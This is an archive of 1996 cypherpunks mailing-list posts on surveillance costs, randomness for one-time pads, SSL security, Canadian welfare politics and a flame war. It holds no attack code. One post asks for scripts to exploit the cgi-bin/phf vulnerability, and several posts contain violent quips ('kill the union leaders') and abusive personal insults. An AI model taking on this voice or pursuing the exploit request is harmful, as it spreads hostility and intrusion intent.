> etc.

That's 50 CENTS per megabyte, but actually it is twice less than that.

My calculation (storage costs only, assume 10kb/sec/person):

6000KB * 0.25c/MB * 2.5E8 = 375 million.

Good money, but not even close to your number.

Also, storing data on optical disks is about $20/600MB, which is only
three cents per megabyte -- ten times less than above.

Even though this is storage media cost alone, 37.5 million surely 
sounds like a reasonable number -- it is 15 cents per person, or
90 cents per hour, or $22.6 per day per person. A little steep, but after
several years this cost may decline tenfold.

Of course my rough calculation missed a lot of important expenses.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Murray Hayes" <mhayes@infomatch.com>
Date: Fri, 29 Nov 1996 02:02:22 -0800 (PST)
To: "cypherpunks" <cypherpunks@toad.com>
Subject: Fwd: Re: wealth and property rights
Message-ID: <199611291002.CAA07224@infomatch.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 27 Nov 1996 10:54:51 -0800 (PST), Dave Kinchlea wrote:

>On Wed, 27 Nov 1996, Clay Olbon II wrote:
>> 
>> This is provably bullshit.  Look at the HUGE numbers of people in this
>> country who make the economic decision to do nothing and go on welfare vs.
>> going to work.  Examine carefully the economic performance of the US vs the
>
>I don't know how much people get on welfare in your country but I
>suspect that it is even less than in this country (Canada). Anyone who
>truly believes that people make the `economic decision to do nothing and
>go on welfare vs. going to work' has, in my opinion, no &^%* idea what
>they are talking about. Just try to *live* on a welfare wage for a few
>months to see how silly this thought is. While there may well be a few

Hmmm, only a few years ago the Finacial Post did a report on welfare in
Ontario.  The maximum benifit package (for two adults, two children or
something like that) came to about 34 000 dollars.  YES 34 000 dollars.
Actually, the figure the Post published was wrong.  Welfare Ontario said
they were a couple of hundred dollars UNDER the true value.

Of course that isn't all in cash.  It comes as subsidies houseing, free diapers,
free baby food......  

Are you telling me that it would be hard to live on 34 grand?  I wasn't aware
that our dollar was so weak....

And then there is the B.C./Alberta fiasco.  The final check welfare recipients
get in Alberta just happens to be the exact amount it costs to buy a bus ticket 
to B.C.

The B.C. govn't gave up ALL federal funding of their welfare program to
impose a rule that required 3 months of residence before benifits would
be given.  

I don't even want to start talking about the newfys.

What it comes down to is this.  Eventually we as a society will have to
make a choice.  We will have to chose between hurting the people who
work and hurting the people who don't work.  You can't have it both ways.
IF  you MUST make the choice, who will you choose?


mhayes@infomatch.com

It's better for us if you don't understand
It's better for me if you don't understand
                                             -Tragically Hip





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Murray Hayes" <mhayes@infomatch.com>
Date: Fri, 29 Nov 1996 02:16:19 -0800 (PST)
To: "cypherpunks" <security@kinch.ark.com>
Subject: Re: wealth and property rights
Message-ID: <199611291016.CAA17877@infomatch.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 27 Nov 1996 15:00:36 -0800 (PST), Dave Kinchlea wrote:

>On Wed, 27 Nov 1996, snow wrote:
>You are clearly an angry young man. I am sorry you have such a poor
>opinion of people, I am even more sorry if it is justified. You can
>believe me or not, but what you describe is *not* the ordinary case in
>this country. Of course, in this country we have a disgusting 10+%
>unemployment rate. Even if people DO want to work, there are no jobs.
>
>All that aside, I can tell you do not have a family if you thing that
>$6.50/hr is a living! Even accounting for the difference in our dollar,
>I would say that is barely subsistence income for a single person. Are
>we *all* not worthy of more than that?
>

Yes, there are maany angry young men in this country.  Unions prevent
young men from compeating in the market place.  Unemployment Insurance 
artificialy increases the unemployment rate by 2% (this is a figure that
many people more knowledgable than me have stated)  welfare increases
the unemployment rate by another 1%.  The Canadian Pension Plan is
out of money and yet I am still forced to contribute and for what???
Will it still exist when I retire?  Not bloody likely.

Fortunatly NAFTA has forced some of our companies to compeat or
die.  Take a look at Canadian.  Are they gone?  I didn't get to watch the
news today......

I'll bet that most of the employees would gladly take a 10% wage cut
to save to company but the union leaders won't let them vote on it.  Why?
Because they would loose power.  Look at what the govn't do.  Most of
them just contribute to the problem by offering hand outs.  They don't
need hand outs!  ONE gov't (Alberta) offered to lower the fuel taxes.


YAAAAA RALPH!!!  (Who's ecinomic reforms incidentally (sp)  was 
hearalded by the Post as a model for govn't across North America)

Cut taxes and kill the union leaders.

Sorry for siting my sources.....


mhayes@infomatch.com

It's better for us if you don't understand
It's better for me if you don't understand
                                             -Tragically Hip





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Thu, 28 Nov 1996 20:24:08 -0800 (PST)
To: Steve Reid <steve@edmweb.com>
Subject: Re: Is /dev/random good enough to generate one-time pads?
In-Reply-To: <Pine.BSF.3.91.961128153422.182A-100000@bitbucket.edmweb.com>
Message-ID: <Pine.LNX.3.94.961129041858.1139C-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 28 Nov 1996, Steve Reid wrote:

> > > Subj sez it all.
> > Yes, as a matter of fact it is.  /dev/random is based on an entropy pool
> > taken from hardware interrupts and such, thus is a RNG, not a PRNG
> 
> I expect it would be "good enough", but it is not _perfectly_ random, and 
> so it wouldn't be a true one-time pad.
> 
> Because it uses MD5, the bits are not all provably independent. You get 
> (very strong) cryptographic security instead of perfect security.
> 
> The one-time pad is easy to explain in theory, but implementing it
> perfectly is extremely difficult. Many people believe that quantum events
> are the only source of perfect randomness, but most methods for harvesting
> that randomness could introduce statistical properties. For example, a
> radioactive substance may have exactly a 50% chance of emitting a particle
> given a certain amount of time, but what happens if your timer isn't
> perfect? 
> 
> One-way hashes are good at removing such obvious and not-so-obvious
> statistical properties, but like a PRNG, you can't prove that the bits it
> produces are all completely independent. It's definately "good enough",
> but it's not perfect. 

One the same note, I must say that implimentation of OTP perfectly is
impossible; you can _never_ prove you have truly random numbers.  The
point is that if the numbers are reasonably independant of each other (i
know -- sortof a contradiction) then they are, as you said, good enough.

The real problem with OTP is still key exchange ;)

 --Deviant
   PGP KeyID = E820F015 Fingerprint = 3D6AAB628E3DFAA9 F7D35736ABC56D39

All extremists should be taken out and shot.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMp5lHzCdEh3oIPAVAQEFxQf9EYQtOcxuNCyHE0VN309pT4ZqHiOCmDHK
+rxy6/M9EDJSywJTd7GC/cVwenHBiR7PjSpJ4tWxTvRrcM58BcF6x0BqSioDpUCj
MBOW+SqYSRtUSEdvdNwdrqKfbZbOQK9dkZ9Dznczj5OKacUJKHdb1A1bfPQPDMh8
1YaOUXTHlcXqX6bOMZ+4Jt2JT8A7dI2EJUxuWIwF3nDyaLW7m8qi5w6k1090Y/3x
4lQinZQIcGZ57J57UP+JfzssbM5RnbVgJTxT+VSVf9QrxrHmZfQTJo0uJ2qC0NwS
LPaNT8eQ6MEWdFJMEI4bGNMWec4yw/3UhKHhAPVkT51Teap3DzIeAQ==
=tx76
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 29 Nov 1996 06:00:25 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Anon
In-Reply-To: <199611290549.VAA09766@atropos.c2.org>
Message-ID: <a5o6XD27w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Doug Barnes <cman@c2.net> writes:
>    (Taiwan story warning...) This reminds me of the pirate cable
>    TV wars, which hit their peak during my stay there -- essentially,
>    the government had outlawed cable TV altogether, mostly because
>    they controlled most of the existing media outlets, and didn't
>    believe the citizen-units needed more than what they had. Various
>    entrepreneurs began wiring Taipei for cable -- sloppy, ad-hoc
>    cable lays that were strung from building to building. The gov't
>    would come and cut the cables; new cables would be laid. People
>    paid their cable bills, but could never quite manage to identify
>    the cable installer when the government came around asking.
>    Programming consisted of a van with a bunch of VCRs and a small
>    satellite dish, that would plug into the network at various places.
>    It go to the point where in some areas there was so much cable, it
>    was tricky to figure out which were the old ones and which were
>    the new. Eventually, the government gave up and licensed some
>    cable operators.

Now, what would the U.S. government (state or los federales) do in a similar
situation? They'd probably fine any resident found with a cable TV thousands
of dollars and if that didn't work, they'd start jailing people. Maybe even
burn a few TV viewers, a la Waco. :-)

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Will Rodger <rodger@worldnet.att.net>
Date: Fri, 29 Nov 1996 05:16:31 -0800 (PST)
To: e$@thumper.vmeng.com, cypherpunks@toad.com
Subject: Re: Whitehouse Releases Blueprint...
Message-ID: <3.0.32.19961129081302.006bb848@postoffice.worldnet.att.net>
MIME-Version: 1.0
Content-Type: text/plain


At 04:08 AM 11/29/96 +0000, you wrote:

>
> Notably, the emphasis is on the needs of business, not "people."
> 
> We are in an excellent position to observe and document the process whereby
> "business" -- that is, organizations motivated primarily, if not
exclusively,
> by the desire for short-term profits accruing to vested interests -- comes
> to dominate and control a technology.  The auto and television industries
come
> to mind as two prior examples.  We are about to see the net go the same way.
> Take notes.
> 
> 			"I have to praise the administration and Ira for
>                       reaching out to the private sector for
>                       comments," Computers and Communication
>                       Industry Association President Ed Black said.
>                       "There's a great emphasis on the needs of
>                       business here."
> 
>                       Even so, privacy activists remained
>                       disappointed with many of the document's
>                       features. "This isn't anything new," said David
>                       Banisar, counsel to the Electronic Privacy and
>                       Information Center. "The privacy stuff is
>                       terrible. They say it's market driven, but
>                       markets don't work with privacy. It's like what
>                       happened with P-Trak."
> 

You bring up a point that is implied - but not explicit - in the article.
And it's a good one. Funny thing is, two of the _industry_ folks suggested
individuals probably needed to be included in the document more than they
were. Neither was keen on being quoted on the record regarding non-business
interests, of course.

Given the attitude of the folks I talked to, I suspect non-business
interests are still fairly important to the White House on this one. 

And remember: Ira Magaziner won no friends in industry with his health care
proposals a couple of years back; some folks think he's leaning in favor of
industry at least initially to make sure what happened then doesn't happen
again.

If Netizens find suggestions from the administration too heavy-handed, my
guess is there's still time to move the discussion.

Cheers.

Will Rodger
Washington Bureau Chief
Inter@ctive Week





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Genocide <gen2600@aracnet.com>
Date: Fri, 29 Nov 1996 08:21:38 -0800 (PST)
To: Benjamin Grosman <bgrosman@healey.com.au>
Subject: Re: First Contact
In-Reply-To: <2.2.32.19961128172612.00746164@healey.com.au>
Message-ID: <Pine.LNX.3.95.961129082137.19764A-100000@shelob.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 28 Nov 1996, Benjamin Grosman wrote:

> Is there anything in First Contact to do with Crypto at all? Just that it
> opened out here today, and I'm going to see it.

	Actually, I believe Data encrypts the main computer with a fractal
key!


Genocide
Head of the Genocide2600 Group


============================================================================
		   **Coming soon! www.Genocide2600.com!!**
        ____________________
 *---===|                  |===---*
 *---===|     Genocide     |===---*   "You have heard of me,
 *---===|       2600       |===---*    You have known what I have done,
 *---===|__________________|===---*    But if you really SEE me,
                                       You'll know your time has come."
Email:
gen2600@aracnet.com
					   Available on the web:
Beeper: (503) 204-3606
					Http://www.aracnet.com/~gen2600


Something I've been known to babble in my sleep:

   It is by caffeine alone that I set my mind in motion.
   It is by the Mountain Dew that the thoughts acquire speed,
   the lips acquire stains, the stains become a warning.
   It is by caffeine alone that I set my mind in motion.

============================================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Laurie <ben@gonzo.ben.algroup.co.uk>
Date: Fri, 29 Nov 1996 01:52:55 -0800 (PST)
To: Anonymous <lucifer@dhp.com>
Subject: Re: SAFEPASSAGE BRINGS STRONG CRYPTO TO WEB BROWSERS WORLDWIDE
In-Reply-To: <199611290102.UAA13822@dhp.com>
Message-ID: <9611290849.aa28944@gonzo.ben.algroup.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous wrote:
> 
> > From: Ben Laurie <ben@gonzo.ben.algroup.co.uk>
> > 
> > I think I would discuss this with the author before going public, to give
> > him the usual opportunity to clean up before all hell breaks loose. However,
> > that is what I'd call "work" rather than "fun", so I'd want paying for it.
> 
> Translation:  You don't really know what you are talking about.
> 
> > My impression is that Eric is more interested in speed and functionality than
> > strict security (and considering the incredible vulnerability that is more or
> > less inherent in an SSL implementation, I feel the same). I could be wrong, of
> > course.
> 
> How is any security hole inherent in an SSL implementation?  The
> protocol itself may not give you everything you need, but regardless
> of whether or not the protocol is useable for any given task (or any
> task at all), nothing precludes a secure implementation.

SSL requires the keying material to be available at all times. This is rather
different from many applications of cryptography, where one can keep keying
material safely locked away except when it is needed.

This is the inherent vulnerability.

Cheers,

Ben.

-- 
Ben Laurie                Phone: +44 (181) 994 6435  Email: ben@algroup.co.uk
Freelance Consultant and  Fax:   +44 (181) 994 6472
Technical Director        URL: http://www.algroup.co.uk/Apache-SSL
A.L. Digital Ltd,         Apache Group member (http://www.apache.org)
London, England.          Apache-SSL author




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Fri, 29 Nov 1996 09:20:44 -0800 (PST)
To: Igor Chudov <ichudov@algebra.com>
Subject: Re: Anon
In-Reply-To: <199611290626.AAA03912@manifold.algebra.com>
Message-ID: <329F1B54.7152@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Igor Chudov @ home wrote:
> Adam Shostack wrote:
> >       Could you give me a cost estimate for keeping video of the
> > last 10 minutes of 250 million lives?  This is essentially one of
> > Brin's suggestions, and it strikes me as astoundingly pricey, even if
> > you just consider the cost of cameras, fiber, switches, and vcrs, and
> > ignore the problem of deciding what tape to keep.
> >       Some back of the envelope leads me to over a trillion,
> > figuring that a second of video takes 10kb, and disk costs about
> > $50/mb.  250m cameras at $40 each, fiber connections at $400 each,
> > etc.

> That's 50 CENTS per megabyte, but actually it is twice less than that.
> My calculation (storage costs only, assume 10kb/sec/person):
> 6000KB * 0.25c/MB * 2.5E8 = 375 million.
> Good money, but not even close to your number.
> Also, storing data on optical disks is about $20/600MB, which is only
> three cents per megabyte -- ten times less than above.
> Even though this is storage media cost alone, 37.5 million surely
> sounds like a reasonable number -- it is 15 cents per person, or
> 90 cents per hour, or $22.6 per day per person. A little steep, but after
> several years this cost may decline tenfold.
> Of course my rough calculation missed a lot of important expenses.

The idea of keeping exhaustive real-time video on all persons is a straw-
man fallacy, I believe.  The real issue is to be able to serveil all or
nearly all persons simultaneously, then, using techniques that won't be
available to the general population for many years (if ever), the agencies
in question can analyze the info and narrow the more intensive aspects of
the surveillance to selected persons.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Fri, 29 Nov 1996 06:22:19 -0800 (PST)
To: cypherpunks@toad.com
Subject: RE: Your Freudian slip is showing
Message-ID: <9610298492.AA849288115@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain



Bovine Remailer <haystack@cow.net> wrote:
>On Thu, 28 Nov 1996 jbugden@smtplink.alis.ca wrote:
>
>> Another anecdotal example is in the opening chapters of "Surely You're
Joking,
>> Mr. Feynman" by Richard Feynman, the late Caltech professor and general bon
>> vivant. He describes how his mother introduced a doctor, a general and a
>> professor with the same respectful tones indicating to him that a career in
>> academia was as highly valued as any other high position in society.
>
>Your lower middle class slip is showing.
 
Damn right! Everything I have I earned myself. I'm not some pampered child of
rich parents. My God, when I think of what my father went through when he was
growing up and what he endured to feed our family, I'm amazed that he didn't
drop dead in his tracks.
 
The fact that my granfather was a well respected municipal politician didn't
insulate them from the effects of the depression. When my father was young he
had to walk almost four miles to and from school, and it was uphill both ways.
Then when he got home he had to chop wood with a hammer. Of course he could have
used an axe, but it was usually dark by this time - they couldn't afford lights
- and he found that a miss with the hammer was less likely to cause severe leg
trauma.
 
After getting his hand crushed in a printing press as a young man and later,
after being layed off after 26 years of hard toil and loyal effort, he wasn't
bitter when he was forced to retired on a pension of $650 per year. He was proud
to have worked hard all his life and succeeded in his own small but not
completely insignificant way.
 
Look where I'm pointing, not at what I'm pointing with.
 
James








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Fri, 29 Nov 1996 09:34:02 -0800 (PST)
To: Doug Barnes <cman@c2.net>
Subject: Re: Anon
In-Reply-To: <199611290549.VAA09766@atropos.c2.org>
Message-ID: <329F1E68.6EF8@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Doug Barnes wrote:
> > Hal Finney wrote:
> > | As I mentioned a couple of days ago, science fiction writer David Brin
> > | has an argument against not only anonymity, but _privacy_ as well.
> > | Where cypherpunks tend to think of privacy as both beneficial and
> > | inevitable, Brin sees it as harmful and doomed.  He has an article in
> > | the December 1996 issue of Wired discussing his ideas.

[snip]

> There are many arguments against David's position; let's grant the
> possibility of near-perfect surveilance if it has popular support
> (which is pretty dubious, but has been addressed by others), and
> see what arguments remain:
> 1) I would conjecture that popular approval would make or break
>    this kind of system. It's amazing what kind of spontaneous civil
>    disobedience can spring up once there's a critical mass of
>    distaste for something like this.
>    (Taiwan story warning...) This reminds me of the pirate cable
>    TV wars, which hit their peak during my stay there -- essentially,
>    the government had outlawed cable TV altogether, mostly because
>    they controlled most of the existing media outlets, and didn't
>    believe the citizen-units needed more than what they had. Various
>    entrepreneurs began wiring Taipei for cable -- sloppy, ad-hoc
>    cable lays that were strung from building to building. The gov't
>    would come and cut the cables; new cables would be laid. People
>    paid their cable bills, but could never quite manage to identify
>    the cable installer when the government came around asking.
>    Programming consisted of a van with a bunch of VCRs and a small
>    satellite dish, that would plug into the network at various places.
>    It go to the point where in some areas there was so much cable, it
>    was tricky to figure out which were the old ones and which were
>    the new. Eventually, the government gave up and licensed some
>    cable operators.

[mo' snip]

The above comments, and the snipped comments about "a few more Wacos will
wake the people up etc.", assume that the govt. hasn't learned anything
about the politics of mass surveillance over the past few decades.

In fact, they've learned a lot.  The surveillance can be kept completely
quiet, and when they need to take someone out, they can do that very
quietly as well.  And not a whole lot of people will be angry, because
they'll crank up the reputation destructo-machine/P.R. press to preclude
any problems there.

Waco was an aberration, because key people were hiding behind a quantity
of other non-key people, and the FBI blundered in and grandstanded to the
point of creating a Kent State kind of scene.  To suggest that future
Waco's are necessary to take out troublemakers is shortsighted.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 29 Nov 1996 09:47:04 -0800 (PST)
To: Paul Pomes <ppomes@Qualcomm.com>
Subject: Re: market for hardware RNG?
Message-ID: <199611291746.JAA22571@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:08 AM 11/26/96 -0800, Paul Pomes wrote:
>There are some commercial products worth studying.  See
><http://rainbow.rmi.net/~comscire/> for one.

Thanks for the reference.  However, I was very unimpressed with their price 
of $295 dollars.  I don't doubt that there are certain organizations 
(banks?) which would have no problem affording them, but that's well out of 
the range of ordinary consumer items.    I just bought a 10x CDROM drive for 
$100; somehow I think that a hardware RNG should cost less than that.  
Volume is a big issue, I suppose.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: null@void.gov
Date: Fri, 29 Nov 1996 09:53:08 -0800 (PST)
To: ben@algroup.co.uk
Subject: Re: SAFEPASSAGE BRINGS STRONG CRYPTO TO WEB BROWSERS WORLDWIDE
Message-ID: <3.0.32.19961129093439.0069cb88@best.com>
MIME-Version: 1.0
Content-Type: text/plain


Well, then, tanslation:

"I say SSLEAY is not secure - but to actually do the homework
to back my assertion then someone has to pay me."

Hmmmph.  Not very useful.  Nor credible.

>I think I would discuss this with the author before going public, to give
>him the usual opportunity to clean up before all hell breaks loose. However,
>that is what I'd call "work" rather than "fun", so I'd want paying for it.
>
>No doubt I'll take it up with Eric at some point, when neither of us has
>anything better to do.
>
>My impression is that Eric is more interested in speed and functionality than
>strict security (and considering the incredible vulnerability that is more or
>less inherent in an SSL implementation, I feel the same). I could be
wrong, of
>course.
>
>I will say that I'm not aware of any problems that a good firewall and
physical
>security don't take care of. That isn't to say there aren't any - I haven't
>looked that hard.
>
>Cheers,
>
>Ben.
>
>> 
>> >I've never seen a security review of SSLeay, and if anyone gave it a clean
>> bill
>> >of health, they didn't have their eye on the ball. Note, I'm not knocking
>> >SSLeay here, it is a wonderful lump of code, but it hasn't been written
with
>> >security in mind (IMHO).
>> >
>> >Cheers,
>> >
>> >Ben.
>> >
>> >-- 
>> >Ben Laurie                Phone: +44 (181) 994 6435  Email:
ben@algroup.co.uk
>> >Freelance Consultant and  Fax:   +44 (181) 994 6472
>> >Technical Director        URL: http://www.algroup.co.uk/Apache-SSL
>> >A.L. Digital Ltd,         Apache Group member (http://www.apache.org)
>> >London, England.          Apache-SSL author
>> >
>> >
>
>-- 
>Ben Laurie                Phone: +44 (181) 994 6435  Email: ben@algroup.co.uk
>Freelance Consultant and  Fax:   +44 (181) 994 6472
>Technical Director        URL: http://www.algroup.co.uk/Apache-SSL
>A.L. Digital Ltd,         Apache Group member (http://www.apache.org)
>London, England.          Apache-SSL author
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: null@void.gov
Date: Fri, 29 Nov 1996 09:53:03 -0800 (PST)
To: ben@algroup.co.uk
Subject: Re: SAFEPASSAGE BRINGS STRONG CRYPTO TO WEB BROWSERS WORLDWIDE
Message-ID: <3.0.32.19961129095226.006a0428@best.com>
MIME-Version: 1.0
Content-Type: text/plain


I would say that depends on -where- &/or -how- you store the premaster/master,
and is dependent on platform threat models rather than attacks on the wire.  
These are different problem spaces with different solutions, which some
contemplated
changes to SSL may help address: some tweaks may be useful to support more
secure secret management on the platforms.  But I would not go so far as to
say
that these issues make SSL or an implementation insecure per-se, until I
did the
complete job.  

If my platform is compromised such that the master or premaster secret
can be subverted, then I have problems that go way deeper than SSL or a
particular
implementation of it.

Would you like to propose some fixes?  We would be very interested.

Ben Laurie wrote ....
>SSL requires the keying material to be available at all times. This is rather
>different from many applications of cryptography, where one can keep keying
>material safely locked away except when it is needed.
>
>This is the inherent vulnerability.
>
>Cheers,
>
>Ben.
>
>-- 
>Ben Laurie                Phone: +44 (181) 994 6435  Email: ben@algroup.co.uk
>Freelance Consultant and  Fax:   +44 (181) 994 6472
>Technical Director        URL: http://www.algroup.co.uk/Apache-SSL
>A.L. Digital Ltd,         Apache Group member (http://www.apache.org)
>London, England.          Apache-SSL author
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjb@ny.ubs.com
Date: Fri, 29 Nov 1996 07:07:14 -0800 (PST)
To: cypherpunks@toad.com
Subject: cgi-bin vulnerability
Message-ID: <199611291506.KAA16645@sherry.ny.ubs.com>
MIME-Version: 1.0
Content-Type: text/plain


does anyone have a pointer to any sample scripts for exploiting the cgi-bin/phf
vulnerability? 

cheers,
	-paul





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Kinchlea <security@kinch.ark.com>
Date: Fri, 29 Nov 1996 10:27:11 -0800 (PST)
To: Murray Hayes <mhayes@infomatch.com>
Subject: Re: wealth and property rights
In-Reply-To: <199611291016.CAA17877@infomatch.com>
Message-ID: <Pine.LNX.3.95.961129101236.550O-100000@kinch.ark.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 29 Nov 1996, Murray Hayes wrote:
> 
> Yes, there are maany angry young men in this country.  Unions prevent
> young men from compeating in the market place.  Unemployment Insurance 
> artificialy increases the unemployment rate by 2% (this is a figure that
> many people more knowledgable than me have stated)  welfare increases
> the unemployment rate by another 1%.  The Canadian Pension Plan is
> out of money and yet I am still forced to contribute and for what???
> Will it still exist when I retire?  Not bloody likely.

I won't argue with your figures, I don't believe them but lets use them
for arguments sake. UI (or is it EI now?) + welfare increase the
unemployment rate by a combined 3%, that still leaves (at least) 7+%
unemployed, a significant number! Meanwhile, major corporations who are
significantly adding to the unemployment rate themselves (heard of
`downsizing') are making record profits. That too must be the poor
people's fault, yes?

You have a right to be angry about CPP, it pisses me too for I know I
won't get a dime either. But the people you *should* be mad at are the
seniors and politians who allowed this to happen, not the people on the
low end.

FWIW, I agree with you about the Unions (for the most part). Many have
lost sight of the reasons they were formed in the first place. The
leaders of those unions, at least the biggies, have become the monster
they so love to hate. The recent Canadian Airline fiasco is a prime
example.

> Fortunatly NAFTA has forced some of our companies to compeat or
> die.  Take a look at Canadian.  Are they gone?  I didn't get to watch the
> news today......

Last I heard, the CAW was still refusing to allow a vote. I would love
to see that union broken myself.
 
> I'll bet that most of the employees would gladly take a 10% wage cut
> to save to company but the union leaders won't let them vote on it.  Why?
> Because they would loose power.  Look at what the govn't do.  Most of
> them just contribute to the problem by offering hand outs.  They don't
> need hand outs!  ONE gov't (Alberta) offered to lower the fuel taxes.
> 
> 
> YAAAAA RALPH!!!  (Who's ecinomic reforms incidentally (sp)  was 
> hearalded by the Post as a model for govn't across North America)

Who has also been implicated in some form of insider trading, not the
white knight everyone would have us believe. 
 
> Cut taxes and kill the union leaders.
> 
> Sorry for siting my sources.....

I assume you mean: "Sorry for NOT citing my sources"

cheers, kinch

PS: I am not going to keep this up, at least not on cypherpunks, it has
zip to do with the charter.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Harmon <harmon@tenet.edu>
Date: Fri, 29 Nov 1996 09:14:37 -0800 (PST)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Counterproductive Dorothy Denning Flames
In-Reply-To: <0315XD25w165w@bwalk.dm.com>
Message-ID: <Pine.OSF.3.91.961129111229.9065D-100000@beall.tenet.edu>
MIME-Version: 1.0
Content-Type: text/plain


Of(spit) course(spit) you(spit) are(spit) correct(spit).

On Thu, 28 Nov 1996, Dr.Dimitri Vulis KOTM wrote:

> ichudov@algebra.com (Igor Chudov @ home) writes: 
> 
> > Dr.Dimitri Vulis KOTM wrote:
> > >
> > > Why do you think I don't discuss my work on this mailing list?
> > >
> >
> > Lemme take a guess, there is probably a good number of people
> > who have a genuine interest as to where you work.
> 
> My Ph.D. thesis is avaiable from UMI. I doubt that anyone subscribed to this
> mailing list has enough clue to understand any of it. :-)
> 
> ---
> 
> Dr.Dimitri Vulis KOTM
> Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeremey Barrett <jeremey@veriweb.com>
Date: Fri, 29 Nov 1996 12:18:29 -0800 (PST)
To: pjb@ny.ubs.com
Subject: Re: cgi-bin vulnerability
In-Reply-To: <199611291506.KAA16645@sherry.ny.ubs.com>
Message-ID: <Pine.BSI.3.93.961129121825.16250A-100000@descartes.veriweb.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 29 Nov 1996 pjb@ny.ubs.com wrote:

> does anyone have a pointer to any sample scripts for exploiting the cgi-bin/phf
> vulnerability? 
> 

Read 2600 this month.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Jeremey Barrett
Senior Software Engineer                         jeremey@veriweb.com
VeriWeb Internet Corp.                           http://www.veriweb.com/

PGP Key fingerprint =  3B 42 1E D4 4B 17 0D 80  DC 59 6F 59 04 C3 83 64
PGP Public Key: http://www.veriweb.com/people/jeremey/pgpkey.html
                
		"less is more."  -- Mies van de Rohe.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMp9FUy/fy+vkqMxNAQEVNgP+N8iV50TXnDkLInlT4a6dsmrbqh5fHpcS
OcgRWquV0vuZ/gl7SWN+nxpMPLeg1foHS3nfYu4D9OQJtumdbQXdgbiAk61hOli3
5YKsFbMF0xtfuWRZ8wLzL0R8Qa5jQGaQbIrS4IkH7mJyxsoMeUYPMWjklH7kf79Y
oP+REy9dxUA=
=ekPQ
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 29 Nov 1996 09:50:28 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Counterproductive Dorothy Denning Flames
In-Reply-To: <849280424.615121.0@fatmans.demon.co.uk>
Message-ID: <yX16XD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


paul@fatmans.demon.co.uk writes:
> all you ever contributed to this list (despite your knowledge of 
> cryptography) was rants about sovok jews and Tim Mays sexual 

You are lying again.  Anyone who bothers to search the archives of
this list for my name will see that 1) I never said anything about
any "Sovok jews", 2) I used to contribute a great deal of technical
discussion before all the techincal people left this list.

Tim May is a vicious anti-Semite who rants about destroying the state
of Israel and exterminating all Jews. Timmy lies that I too am an
anti-Semite (I'm actually Jewish) and now Paul repeats Tim's lies.

> orientation. I happen to be knowledgable about cryptography but even 
> if I`m not an expert I do tend to post things that are of value and 
> interest as opposed to worthless flames.

Paul lies again. Paul's contributions to this mailing lists contsist of
assinine rants about "brute force attacks on OTP" and attacks on people
who know more than him, such as Don Woods (whom Paul calls "Don Woods (spit").

Paul's calling cryptorelevant discussion "bullshit" and e-mailing me
multiple copies of my own cypherpunks writings with the word "fuckhead:
added are some of the examples of his worthless flames and net-abuse.

I guess John Gilmore finds Paul Bradley a suitable ass-boy.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




